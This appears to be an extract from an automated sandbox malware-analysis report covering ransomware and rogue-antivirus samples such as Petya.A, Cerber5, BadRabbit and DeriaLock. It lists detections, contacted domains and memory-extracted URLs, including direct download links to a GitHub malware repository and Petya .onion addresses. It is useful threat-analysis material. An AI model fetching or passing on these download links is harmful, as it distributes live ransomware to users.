        5.0.Endermanch@Cerber5.exe.400000.2.unpack100%AviraHEUR/AGEN.1227089Download File
        13.2.Fantom.exe.400000.0.unpack100%AviraHEUR/AGEN.1242303Download File
        44.2.Endermanch@Petya.A.exe.400000.0.unpack100%AviraHEUR/AGEN.1205487Download File
        4.2.rundll32.exe.4a40000.2.unpack100%AviraHEUR/AGEN.1234590Download File
        1.0.Endermanch@BadRabbit.exe.880000.3.unpack100%AviraTR/ATRAPS.GenDownload File
        3.0.Endermanch@Birele.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        44.0.Endermanch@Petya.A.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.jvzjDownload File
        47.0.Endermanch@PolyRansom.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        1.0.Endermanch@BadRabbit.exe.880000.1.unpack100%AviraTR/ATRAPS.GenDownload File
        44.0.Endermanch@Petya.A.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.jvzjDownload File
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://www.tiro.comF0%URL Reputationsafe
        http://www.tiro.comF0%URL Reputationsafe
        http://www.sajatypeworks.com0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
        http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/V0%URL Reputationsafe
        http://www.advancedinstaller.com00%URL Reputationsafe
        http://www.sandoll.co.krl0%URL Reputationsafe
        http://www.carterandcone.comu0%URL Reputationsafe
        http://www.fonts.comX0%URL Reputationsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip0%Avira URL Cloudsafe
        http://www.carterandcone.comof0%URL Reputationsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip0%Avira URL Cloudsafe
        http://www.sajatypeworks.coma-d0%URL Reputationsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip0%Avira URL Cloudsafe
        http://www.tiro.com0%URL Reputationsafe
        http://www.carterandcone.com0%URL Reputationsafe
        http://www.carterandcone.com.0%URL Reputationsafe
        http://fontfabrik.com0%URL Reputationsafe
        http://www.fonts.comic0%URL Reputationsafe
        http://www.carterandcone.com90%URL Reputationsafe
        http://www.founder.com.cn/cns0%URL Reputationsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip0%VirustotalBrowse
        http://www.sandoll.co.kr0%URL Reputationsafe
        http://www.sakkal.com0%URL Reputationsafe
        http://www.founder.com.cn/cnd0%URL Reputationsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip0%VirustotalBrowse
        http://ocsp.thawte.com00%URL Reputationsafe
        http://wallup.nethttp://wallup.nethttp://wallup.net0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip0%VirustotalBrowse
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip0%VirustotalBrowse
        http://192.168.2.1/0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip0%Avira URL Cloudsafe
        http://petya5koahtsf7sv.onion/0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/kV0%Avira URL Cloudsafe
        http://petya5koahtsf7sv.onion/http://petya37h5tbhyvki.onion/SeShutdownPrivilegeNtRaiseHardErrorNTDLL0%Avira URL Cloudsafe
        http://www.carterandcone.comCt0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/jp/=V0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip0%Avira URL Cloudsafe
        http://www.sakkal.com(0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zip0%Avira URL Cloudsafe
        http://petya37h5tbhyvki.onion/SVjaQ40%Avira URL Cloudsafe
        http://www.founder.com.cn/cnhtu0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip0%Avira URL Cloudsafe
        http://collect.installeranalytics.com70%Avira URL Cloudsafe
        http://www.carterandcone.comark0%Avira URL Cloudsafe
        http://poetry.rotten.com/lightning/0%Avira URL Cloudsafe
        http://192.168.2.1/Ea0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zip0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus.zip0%Avira URL Cloudsafe
        http://petya5koahtsf7sv.onion/SVjaQ40%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip0%Avira URL Cloudsafe
        http://www.carterandcone.comVjts0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/NV0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/jp/kV0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        google.com
        172.217.168.14
        truefalse
          high
          github.com
          140.82.121.3
          truefalse
            high
            raw.githubusercontent.com
            185.199.110.133
            truefalse
              high
              arizonacode.bplaced.net
              162.55.0.137
              truefalse
                high
                powertoolsforyou.com
                38.238.72.106
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zipfalse
                    high
                    https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zipfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zipfalse
                      high
                      https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Xyeta.zipfalse
                        high
                        https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/ViraLock.zipfalse
                          high
                          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zipfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zipfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zipfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Krotten.zipfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender%202015.zipfalse
                            high
                            https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zipfalse
                              high
                              https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Fantom.zipfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zipfalse
                                high
                                https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/SecurityScanner.zipfalse
                                  high
                                  https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Petya.A.zipfalse
                                    high
                                    https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Live%20Protection%20Suite%202019.zipfalse
                                      high
                                      https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Happy%20Antivirus.zipfalse
                                        high
                                        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zipfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zipfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zipfalse
                                          high
                                          https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Winlocker.VB6.Blacksod.zipfalse
                                            high
                                            https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zipfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zipfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zipfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zipfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://google.com/false
                                              high
                                              https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender.zipfalse
                                                high
                                                https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zipfalse
                                                  high
                                                  https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus.zipfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/VAV2008.zipfalse
                                                    high
                                                    https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zipfalse
                                                      high
                                                      https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/FakeAdwCleaner.zipfalse
                                                        high
                                                        https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender%20v2.zipfalse
                                                          high
                                                          https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Movie.mpeg.zipfalse
                                                            high
                                                            https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/AnViPC2009.zipfalse
                                                              high
                                                              https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/InternetSecurityGuard.zipfalse
                                                                high
                                                                https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/WannaCrypt0r.zipfalse
                                                                  high
                                                                  https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zipfalse
                                                                    high
                                                                    https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zipfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus.zipfalse
                                                                      high
                                                                      https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/SE2011.zipfalse
                                                                        high
                                                                        https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zipfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/NavaShield.zipfalse
                                                                          high
                                                                          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zipfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zipfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Security%20Central.zipfalse
                                                                            high
                                                                            https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zipfalse
                                                                              high
                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                              https://www.torproject.org/downlo&#097;d/download-easy.html.enEndermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.tiro.comFEndermanch@DeriaLock.exe, 0000000B.00000003.356635658.000000000595B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.356492362.000000000595B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.356437745.000000000595B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://www.torproject.org/Endermanch@Cerber5.exe, 00000005.00000003.362009914.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DR069.44.drfalse
                                                                                  high
                                                                                  https://www.youtube.comEndermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.sajatypeworks.comEndermanch@DeriaLock.exe, 0000000B.00000003.354908029.0000000005963000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.354591328.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.354251930.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.352914234.000000000595D000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.353856101.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.355248270.0000000005963000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.353598984.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.354490867.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.353177160.0000000005963000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.353764340.0000000005963000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.353490553.0000000005964000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://wallup.nethttp://wallup.nethttp://wallup.netEndermanch@DeriaLock.exe, 0000000B.00000002.534778390.0000000000997000.00000004.00000020.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000000.334023928.00000000004C2000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://petya5koahtsf7sv.onion/Endermanch@Petya.A.exe, 0000002C.00000002.555456334.000000000041B000.00000040.00000001.01000000.00000015.sdmptrue
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://www.carterandcone.comCtEndermanch@DeriaLock.exe, 0000000B.00000003.364397133.0000000005948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://192.168.2.1/rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.364020758.00000000033AC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.363964013.00000000033A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://www.jiyu-kobo.co.jp/Y0Endermanch@InfinityCrypt.exe, 0000001A.00000003.369496171.0000000005AF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.ascendercorp.com/typedesigners.htmlEndermanch@DeriaLock.exe, 0000000B.00000003.370278853.000000000594B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.370555642.000000000594B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://petya5koahtsf7sv.onion/http://petya37h5tbhyvki.onion/SeShutdownPrivilegeNtRaiseHardErrorNTDLLEndermanch@Petya.A.exe, 0000002C.00000002.555456334.000000000041B000.00000040.00000001.01000000.00000015.sdmptrue
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://diskcryptor.net/rundll32.exe, 00000004.00000003.347913498.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.329448544.000000000334C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.363121457.000000000335A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.342307244.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.330844092.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.342061025.0000000004AB1000.00000004.00000800.00020000.00000000.sdmp, dispci.exe, 00000023.00000000.361792581.0000000000B0E000.00000002.00000001.01000000.00000013.sdmpfalse
                                                                                      high
                                                                                      http://www.jiyu-kobo.co.jp/kVEndermanch@InfinityCrypt.exe, 0000001A.00000003.368531949.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001A.00000003.367448394.0000000005AF3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.jiyu-kobo.co.jp/VEndermanch@InfinityCrypt.exe, 0000001A.00000003.369496171.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001A.00000003.368531949.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001A.00000003.367448394.0000000005AF3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://www.advancedinstaller.com0Error file remover.msi.53.drfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://www.sandoll.co.krlEndermanch@DeriaLock.exe, 0000000B.00000003.360250995.0000000005949000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://www.baidu.com/s?wd=%E6%80%8E%E4%B9%88%E5%AE%89%E8%A3%85%20tor%20%E6%B5%8F%E8%A7%88%E5%99%A8Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://wallup.netEndermanch@DeriaLock.exe, 0000000B.00000002.534778390.0000000000997000.00000004.00000020.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000000.334023928.00000000004C2000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                                          high
                                                                                          http://www.carterandcone.comuEndermanch@DeriaLock.exe, 0000000B.00000003.364397133.0000000005948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://nsis.sf.net/NSIS_ErrorErrorEndermanch@FakeAdwCleaner.exe.0.drfalse
                                                                                            high
                                                                                            http://www.fonts.comXEndermanch@DeriaLock.exe, 0000000B.00000003.354251930.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.354490867.0000000005964000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.jiyu-kobo.co.jp/jp/=VEndermanch@InfinityCrypt.exe, 0000001A.00000003.369496171.0000000005AF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://arizonacode.bplaced.net/HF/SystemLocker/unlock-everybody.txtEndermanch@DeriaLock.exe, 0000000B.00000000.335032516.0000000000506000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                                              high
                                                                                              http://www.carterandcone.comofEndermanch@DeriaLock.exe, 0000000B.00000003.364397133.0000000005948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://nsis.sf.net/NSIS_ErrorEndermanch@FakeAdwCleaner.exe.0.drfalse
                                                                                                high
                                                                                                http://www.sakkal.com(Endermanch@DeriaLock.exe, 0000000B.00000003.370373265.0000000005953000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                low
                                                                                                http://petya37h5tbhyvki.onion/SVjaQ4Endermanch@Petya.A.exe, 0000002C.00000002.532115532.000000000019C000.00000004.00000010.00020000.00000000.sdmptrue
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://www.sajatypeworks.coma-dEndermanch@DeriaLock.exe, 0000000B.00000003.354591328.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.354251930.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.352914234.000000000595D000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.353856101.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.353598984.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.354490867.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.353177160.0000000005963000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.353764340.0000000005963000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.353490553.0000000005964000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://www.youtube.com/results?search_query=InstallEndermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.thawte.com/repository0Error file remover.msi.53.drfalse
                                                                                                    high
                                                                                                    http://www.carterandcone.comarkEndermanch@DeriaLock.exe, 0000000B.00000003.364397133.0000000005948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://collect.installeranalytics.com7Error file remover.msi.53.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.founder.com.cn/cnhtuEndermanch@InfinityCrypt.exe, 0000001A.00000003.361638956.0000000005B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://poetry.rotten.com/lightning/Endermanch@Krotten.exe.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.tiro.comEndermanch@DeriaLock.exe, 0000000B.00000003.356383984.000000000595B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.356492362.000000000595B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.358281690.000000000595B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.356437745.000000000595B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.carterandcone.comEndermanch@DeriaLock.exe, 0000000B.00000003.364397133.0000000005948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.carterandcone.com.Endermanch@DeriaLock.exe, 0000000B.00000003.364397133.0000000005948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://192.168.2.1/Earundll32.exe, 00000004.00000002.363964013.00000000033A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://fontfabrik.comEndermanch@DeriaLock.exe, 0000000B.00000003.356383984.000000000595B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.fonts.comicEndermanch@DeriaLock.exe, 0000000B.00000003.354717861.000000000595B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://crl.thawte.com/ThawteTimestampingCA.crl0rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.347913498.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.329448544.000000000334C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.363121457.000000000335A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.342307244.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.330844092.0000000003363000.00000004.00000020.00020000.00000000.sdmp, Error file remover.msi.53.drfalse
                                                                                                      high
                                                                                                      http://www.carterandcone.com9Endermanch@DeriaLock.exe, 0000000B.00000003.364397133.0000000005948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://www.founder.com.cn/cnsEndermanch@InfinityCrypt.exe, 0000001A.00000003.362693889.0000000005B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://petya5koahtsf7sv.onion/SVjaQ4Endermanch@Petya.A.exe, 0000002C.00000002.532115532.000000000019C000.00000004.00000010.00020000.00000000.sdmptrue
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.fonts.comEndermanch@DeriaLock.exe, 0000000B.00000003.354230243.000000000595B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.354717861.000000000595B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.354316802.000000000595B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.355145266.000000000595B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.sandoll.co.krEndermanch@DeriaLock.exe, 0000000B.00000003.360250995.0000000005949000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://www.sakkal.comEndermanch@DeriaLock.exe, 0000000B.00000003.370373265.0000000005953000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.370657670.0000000005953000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://www.carterandcone.comVjtsEndermanch@DeriaLock.exe, 0000000B.00000003.364397133.0000000005948000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.369047483.000000000594B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.368115603.000000000594B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.366435009.000000000594A000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.366996082.000000000594B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://www.founder.com.cn/cndEndermanch@InfinityCrypt.exe, 0000001A.00000003.362016278.0000000005B0B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001A.00000003.362693889.0000000005B0B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001A.00000003.362350811.0000000005B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://www.jiyu-kobo.co.jp/NVEndermanch@InfinityCrypt.exe, 0000001A.00000003.369496171.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001A.00000003.368531949.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001A.00000003.367448394.0000000005AF3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://www.jiyu-kobo.co.jp/jp/kVEndermanch@InfinityCrypt.exe, 0000001A.00000003.369496171.0000000005AF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
